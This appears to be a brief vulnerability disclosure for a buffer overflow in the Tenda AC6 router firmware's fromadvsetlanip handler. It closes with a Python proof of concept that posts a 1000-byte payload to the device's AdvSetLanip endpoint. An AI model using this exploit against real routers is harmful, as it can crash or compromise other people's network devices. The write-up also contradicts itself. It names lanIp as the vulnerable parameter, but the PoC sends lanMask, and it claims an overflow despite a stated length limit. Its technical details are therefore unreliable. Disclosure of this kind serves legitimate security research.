Overview

• The device’s official website: https://www.tenda.com.cn/product/overview/AC6.html
• Firmware download website: https://www.tendacn.com/download/detail-3793.html

Affected version

AC6 V1.0 V15.03.05.16

Vulnerability details

The Tenda AC6 V1.0 V15.03.05.16 firmware has a buffer overflow vulnerability in the fromadvsetlanip function. The s1 variable receives the lanIp parameter from a POST request and is later passed to the strncpy function. Although the statement strncpy((char *)&a4[38 * a3 + 2], a1, 0x1Fu) limits the copy length to 0x1Fubytes, a buffer overflow may still occur if the destination buffer is too small. User-controlled input of lanIp could trigger this vulnerability.

POC

import requests
ip = "192.168.1.1"
url = f'http://{ip}/goform/AdvSetLanip'
payload = b'a' * 1000
data = {
    'lanMask':payload
}
requests.post(url, data=data)